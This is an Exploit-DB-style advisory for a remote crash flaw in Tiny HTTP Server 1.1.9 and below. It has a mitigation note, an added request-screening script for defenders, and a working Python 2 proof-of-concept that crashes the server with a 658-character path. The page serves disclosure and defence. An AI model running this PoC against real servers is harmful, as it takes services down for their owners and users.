Vendor: Tiny HTTP Server
By: localh0t
CVSS: 7.5 (HIGH)
Remote Crash
CWE: N/A
Product Name: Tiny HTTP Server
Affected Version From: 1.1.9 and below
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows (All)
2011

Tiny HTTP Server <=v1.1.9 Remote Crash PoC

This is a proof of concept for a remote crash vulnerability in Tiny HTTP Server version 1.1.9 and below. The PoC sends a GET request whose path consists of 658 "X" characters, which causes the server to crash.

Mitigation:

Upgrade to the latest version of Tiny HTTP Server.
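
Until the upgrade is in place, requests shaped like the one the PoC sends can be screened in front of the server or searched for in captured traffic. The following is an added example, not part of the original entry or of localh0t's PoC; the function names, the 512-character limit and the repeated-character heuristic are assumptions, since the page states only that a 658-character path crashes the server and not the minimum length.

```python
import re

# Assumed limit: the page only says a 658-character path crashes the server,
# not the minimum length, so this threshold is a conservative placeholder.
MAX_TARGET_LEN = 512
# Assumed heuristic: 64 or more copies of one character in a row is filler.
FILLER_RUN = re.compile(r"(.)\1{63,}")
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")


def inspect_request_line(line):
    """Return the reasons a request line resembles the crash pattern."""
    match = REQUEST_LINE.match(line.rstrip("\r\n"))
    if match is None:
        return ["malformed request line"]
    target = match.group(2)
    reasons = []
    if len(target) > MAX_TARGET_LEN:
        reasons.append("target length %d exceeds %d" % (len(target), MAX_TARGET_LEN))
    if FILLER_RUN.search(target):
        reasons.append("long run of a repeated character")
    return reasons


def screen(lines):
    """Map each flagged request line (truncated for logging) to its reasons."""
    flagged = {}
    for line in lines:
        reasons = inspect_request_line(line)
        if reasons:
            flagged[line[:40]] = reasons
    return flagged


# Constructed sample input: two ordinary requests and one shaped like the PoC.
SAMPLE = [
    "GET /index.html HTTP/1.1\r\n",
    "GET /images/logo.png?v=3 HTTP/1.1\r\n",
    "GET /" + "X" * 658 + " HTTP/1.1\r\n",
]

if __name__ == "__main__":
    for prefix, why in screen(SAMPLE).items():
        print(prefix, "->", "; ".join(why))
```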

Exploit-DB raw data:

#!/usr/bin/python

# Tiny HTTP Server <=v1.1.9 Remote Crash PoC
# written by localh0t
# Date: 24/02/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Targets: Windows (All)

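# Python 2 script (uses httplib and print statements)
import httplib
import sys

if (len(sys.argv) < 3):
    print "\nTiny HTTP Server <=v1.1.9 Remote Crash PoC"
    print "\n	Usage: %s <host> <port> \n" %(sys.argv[0])
    sys.exit()

# Request path body: 658 "X" characters
payload = "X" * 658

# Defined before the try block so the cleanup below never hits an unbound name
httpServ = None

try:
    print "\n[!] Connecting to %s ..." %(sys.argv[1])
    httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
    httpServ.connect()
    print "[!] Sending payload..."
    # The payload is sent as the path of a GET request
    httpServ.request('GET', "/" + str(payload))
    print "[!] Exploit succeed. Check %s if crashed.\n" %(sys.argv[1])
except:
    print "[-] Connection error, exiting..."

if httpServ is not None:
    httpServ.close()
sys.exit()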